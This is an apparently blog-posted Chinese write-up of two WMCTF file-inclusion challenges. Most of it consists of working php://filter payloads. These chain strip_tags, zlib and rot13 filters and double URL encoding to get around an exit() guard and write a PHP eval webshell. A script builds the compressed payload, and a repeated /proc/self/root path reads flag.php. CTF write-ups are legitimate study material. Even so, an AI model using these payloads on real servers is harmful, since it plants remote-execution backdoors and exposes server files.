WMCTF 文件包含两题

过滤器绕过

php://filter/write=string.strip_tags|zlib.inflate|%3F%3E%b3%b1%2f%c8%2
8%50%28%ae%2c%2e%49%cd%d5%50%89%77%77%0d%89%8e%8f%d5%b4%b6%b7%03%3C%3F/resourc
e=123.php

其中URL编码的payload。以下获取。然后加上%3F%3E。闭合原来的PHP标签。经过targs就会删掉exit。然后再经过zlib解压。得到一句话
<?php
file_put_contents('php://filter/write=zlib.deflate/resource=1.php','<?php eval($_GET[1]);?>');
var_dump(urlencode(file_get_contents('1.php')));

第二种
php://filter/zlib.deflate|string.tolower|zlib.inflate|?><?php%0deval($_GET[1]);?>/resource=123.php

第三种
php://filter/write=%7%33tring.strip_tags|%7%41lib.inflate|%3F%3E%B3%B1%2F%C8%28PH-K%CC%D1P%89ww%0D%896%8C%D5%B4%B6%B7%03;/resource=1.php

二次编码绕过

php://filter/write=string.%7%32ot13|cuc cucvasb();|/resource=Cyc1e.php
浏览器一次解码。file_put_contents二次解码

http://v2222.no_body_knows_php_better_than_me.glzjin.wmctf.wetolink.com/?
file=php://filter/convert.base64-
encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/p
roc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc
/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/se
lf/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/
root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/roo
t/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/p
roc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc
/self/cwd/flag.php

暂时没搞懂。。。啥32层的

下一篇： WMCTF webweb(反序列化POP链)→